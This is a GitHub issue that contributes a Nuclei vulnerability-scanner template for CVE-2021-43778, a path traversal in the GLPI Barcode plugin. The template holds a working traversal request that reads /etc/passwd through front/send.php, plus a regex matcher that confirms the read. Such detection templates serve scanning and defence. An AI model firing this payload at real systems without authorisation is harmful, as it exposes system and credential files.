### ISSUE TITLE
CVE-2021-43778 -- GLPI plugin Barcode < 2.6.1 path traversal vulnerability

### ISSUE THREAD

**Issue by cckuailong** [projectdiscovery/nuclei-templates#3234]
### Template Information:

GLPI plugin Barcode < 2.6.1 path traversal vulnerability.

### Nuclei Template:

```yaml
id: CVE-2021-43778

info:
  name: GLPI plugin Barcode < 2.6.1 path traversal vulnerability.
  author: cckuailong
  severity: critical
  description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-43778
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2021-43778
  tags: GLPI, Barcode

requests:
  - method: GET
    path:
      - "{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"
    headers:
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5)

    matchers:
      - type: status
        status:
          - 200

      - type: regex
        name: LFI
        regex:
          - "root:.*:0:0"
```

![image](https://user-images.githubusercontent.com/10824150/144186925-a4bf6231-dd50-4c82-b593-eba3cd7506c7.png)
![image](https://user-images.githubusercontent.com/10824150/144186977-f69d018d-4056-4d5f-be91-9bee1f9d6753.png)
